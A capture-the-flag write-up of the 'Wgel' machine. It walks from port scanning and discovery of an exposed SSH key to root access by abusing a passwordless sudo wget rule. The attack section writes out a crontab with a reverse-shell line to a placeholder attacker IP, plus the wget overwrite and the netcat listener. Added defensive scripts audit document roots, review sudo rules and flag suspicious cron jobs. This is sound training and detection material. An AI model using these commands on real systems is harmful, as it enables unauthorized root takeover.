
Wgel CTF

This report documents the process of successfully compromising the "Wgel" Capture the Flag (CTF) machine. The attack path involved identifying an exposed SSH private key through web directory enumeration, gaining initial access as a low-privileged user, and escalating privileges to root by exploiting a misconfigured wget binary allowed to be run with sudo. The final privilege escalation leverages wget to overwrite the system's crontab, injecting a reverse shell command.

1. Reconnaissance and Enumeration

1.1. Initial Port Scan

export TARGET_IP=10.10.103.164  # Best practice: Store the IP in a variable
nmap -p- --min-rate 5000 -oN initial_scan $TARGET_IP

Results:

PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

1.2. Web Server Enumeration

We focused on the web server (port 80) for further enumeration.

1.2.1. Source Code Inspection

Examining the source code of the main page (view-source:http://$TARGET_IP/) revealed a comment:

<!-- Jessie don't forget to udate the webiste -->

This comment strongly suggests a potential username: jessie. This information is valuable for later stages, such as brute-forcing or attempting to use default credentials.

1.2.2. Directory and File Enumeration

We used feroxbuster to perform directory and file brute-forcing, looking for hidden content:

feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt -o ferox_scan.txt

Key Findings:

301      GET        9l       28w      316c http://10.10.103.164/sitemap => http://10.10.103.164/sitemap/
301      GET        9l       28w      321c http://10.10.103.164/sitemap/.ssh => http://10.10.103.164/sitemap/.ssh/
200      GET       27l       33w     1675c http://10.10.103.164/sitemap/.ssh/id_rsa

Critically, feroxbuster discovered a publicly accessible SSH private key (id_rsa) within the /sitemap/.ssh/ directory. This is a severe security misconfiguration.
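The finding above is, from the server-administration side, a document-root hygiene failure: a key file was copied under a directory the web server serves. The following script is an added example, not part of the original write-up, that audits a document root for files which should never be reachable over HTTP. It matches both by name (dotfile directories, common key names) and by content (a PEM private-key header), so a key renamed to backup.txt is still caught. The document-root path and the constructed demo tree are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit a web document root
# for files that should never be served (SSH keys, .git, .env, htpasswd).
# Pass the real document root (e.g. /var/www/html) as the argument.

# Name-based matches: dotfile directories and well-known key file names.
exposed_by_name() {
    find "$1" \( -path '*/.ssh/*' -o -path '*/.git/*' -o -name 'id_rsa' \
        -o -name 'id_dsa' -o -name 'id_ecdsa' -o -name 'id_ed25519' \
        -o -name '*.pem' -o -name '.env' -o -name '.htpasswd' \) -type f 2>/dev/null
}

# Content-based matches: any file that starts with a PEM private-key header,
# whatever it was renamed to.
exposed_by_content() {
    grep -rlE -- '^-----BEGIN (OPENSSH |RSA |EC |DSA )?PRIVATE KEY-----' "$1" 2>/dev/null
}

# Union of both checks, one path per line, deduplicated.
find_exposed_secrets() {
    { exposed_by_name "$1"; exposed_by_content "$1"; } | sort -u
}

# Writes a constructed, non-functional PEM blob so the demo runs offline.
write_fake_key() {
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' \
        'CONSTRUCTED_PLACEHOLDER_NOT_A_REAL_KEY' \
        '-----END RSA PRIVATE KEY-----' > "$1"
}

# Constructed document root: one key under sitemap/.ssh (as on the target),
# one renamed copy, and one harmless stylesheet. Prints the directory path.
make_demo_docroot() {
    d=$(mktemp -d)
    mkdir -p "$d/sitemap/.ssh" "$d/css"
    write_fake_key "$d/sitemap/.ssh/id_rsa"
    write_fake_key "$d/backup.txt"
    printf 'body { color: black; }\n' > "$d/css/style.css"
    printf '%s\n' "$d"
}

# Usage: sh audit_docroot.sh /var/www/html
if [ -n "${1:-}" ]; then
    find_exposed_secrets "$1"
fi
```

Run it from a cron job or a deployment hook and treat any output as a blocking finding; the content check is the one that matters, since attackers enumerate by name and defenders rarely remember what a colleague renamed.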

2. Initial Access (User: jessie)

2.1. Obtaining and Using the Private Key

We downloaded the id_rsa file and prepared it for use with SSH:

wget http://$TARGET_IP/sitemap/.ssh/id_rsa -O id_rsa_jessie
chmod 600 id_rsa_jessie

We then used the private key to connect to the target machine as the user jessie:

ssh -i id_rsa_jessie jessie@$TARGET_IP

This successfully established an SSH session as jessie.

3. Privilege Escalation (jessie -> root)

3.1. Enumerating Privileges

Once inside, we checked jessie's sudo privileges:

sudo -l

Output:

User jessie may run the following commands on CorpOne:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/wget

This output reveals two important points:

  1. (ALL : ALL) ALL lets jessie run any command as any user, but that rule prompts for jessie's password, which we do not have (we authenticated with a key), so it is not directly usable here.
  2. (root) NOPASSWD: /usr/bin/wget lets jessie run /usr/bin/wget as root without a password. This is the key to our privilege escalation.

3.2. Exploiting wget

The ability to run wget as root allows us to read and, crucially, write arbitrary files on the system: wget's -O option chooses the output path, and as root no path is off limits. We'll use this to overwrite the /etc/crontab file, injecting a reverse shell command that will be executed by the root user.
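The rule that makes this possible is easy to spot in a review. The script below is an added example, not part of the original write-up: it takes text in the format sudo -l prints (the sample is constructed to mirror the findings above), lists every NOPASSWD rule, and flags those whose command is a binary that can write to an arbitrary path as the target user. The list of such binaries is an assumption to extend for your environment.

```shell
#!/bin/sh
# Added example, not part of the original write-up: review sudo rules for
# passwordless entries whose command can write arbitrary files as root.
# SAMPLE_RULES is constructed from the `sudo -l` output in the report.

SAMPLE_RULES='User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget'

# Binaries whose ordinary options choose an output path (wget -O is the case
# exploited in this report). Assumed list; extend it for your environment.
FILE_WRITERS='wget|curl|tee|cp|mv|dd|rsync'

# Every rule that runs without a password prompt, leading whitespace stripped.
nopasswd_rules() {
    printf '%s\n' "$1" | grep 'NOPASSWD' | sed 's/^[[:space:]]*//'
}

# NOPASSWD rules whose command is one of the file-writing binaries.
nopasswd_file_writers() {
    nopasswd_rules "$1" | grep -E "/($FILE_WRITERS)([[:space:]]|$)"
}

# Number of findings; zero means the host passes this check.
count_findings() {
    nopasswd_file_writers "$1" | grep -c .
}

# Usage on a live host (as the user being reviewed):
#   count_findings "$(sudo -l 2>/dev/null)"
#   nopasswd_file_writers "$(sudo -l 2>/dev/null)"
```

The remediation is to delete the rule rather than try to constrain it: sudoers cannot safely restrict which path wget -O writes to, and an argument allow-list is brittle. If a service account genuinely needs to fetch files as root, give it a wrapper script with a fixed destination and grant sudo on the wrapper only.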

3.3. Crafting the Malicious Crontab

We created a modified crontab file on our attacking machine:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root bash -c "sh -i >& /dev/tcp/<YOUR_ATTACKER_IP>/6666 0>&1"

  • * * * * * root ...: This line adds a new cron job that runs every minute as the root user.
  • bash -c "sh -i >& /dev/tcp/<YOUR_ATTACKER_IP>/6666 0>&1": This is a standard reverse shell command. It creates an interactive shell (sh -i) and redirects its input, output, and error streams (>& ... 0>&1) to a TCP connection on our attacking machine's IP address and port 6666. Replace <YOUR_ATTACKER_IP> with your actual attacking machine's IP address.
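The planted line has two tells a defender can key on: a root job scheduled every minute, and a command that opens a network socket or an interactive shell. The script below is an added example, not part of the original write-up, that parses a system crontab (the /etc/crontab and /etc/cron.d format, which carries a user field) and prints jobs matching either tell. The sample crontab is constructed from the one shown above, and the indicator patterns are an assumption to tune.

```shell
#!/bin/sh
# Added example, not part of the original write-up: flag suspicious entries in
# a system crontab. SAMPLE_CRONTAB is constructed from the report's planted file.

SAMPLE_CRONTAB='SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root bash -c "sh -i >& /dev/tcp/<YOUR_ATTACKER_IP>/6666 0>&1"'

# Print each job line that runs every minute as root, or whose command part
# carries a network or interactive-shell indicator (assumed pattern list).
suspicious_cron_jobs() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ || /^[A-Za-z_]+=/ { next }   # comments, blanks, VAR=value
        NF < 7 { next }                                              # fewer fields than a job line
        {
            every_minute = ($1 == "*" && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*")
            cmd = ""
            for (i = 7; i <= NF; i++) cmd = cmd " " $i             # fields 7.. are the command
            netshell = (cmd ~ /\/dev\/tcp|\/dev\/udp|(^| )nc |ncat|bash -i|sh -i/)
            if (($6 == "root" && every_minute) || netshell) print $0
        }'
}

# Number of flagged jobs; zero means the crontab passes this check.
count_suspicious_cron_jobs() {
    suspicious_cron_jobs "$1" | grep -c .
}

# Usage on a live host:
#   suspicious_cron_jobs "$(cat /etc/crontab)"
#   for f in /etc/cron.d/*; do suspicious_cron_jobs "$(cat "$f")"; done
```

Pattern matching catches the textbook payload; the more robust control is integrity monitoring, since a legitimate /etc/crontab almost never changes. Recording its sha256sum at build time and alerting on any difference would have caught this overwrite regardless of what the new line contained, and auditd's write watch on /etc/crontab and /etc/cron.d would have attributed the change to the wget process running under sudo.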

3.4. Hosting and Deploying the Payload

We use a Python HTTP server on the attacking machine to host the malicious crontab.

Attacker machine:

nano crontab   # paste the crontab content above
python3 -m http.server 80

Target machine:

sudo wget <YOUR_ATTACKER_IP>/crontab -O /etc/crontab

  • sudo wget ... -O /etc/crontab: This uses wget (running as root) to download our malicious crontab file and overwrite the system's /etc/crontab.

3.5. Receiving the Reverse Shell

On our attacking machine, we set up a netcat listener:

Attacker machine:

nc -lvnp 6666

Within a minute the cron job executes and we receive a reverse shell connection as root, which we confirm with:

id # uid=0(root) gid=0(root) groups=0(root)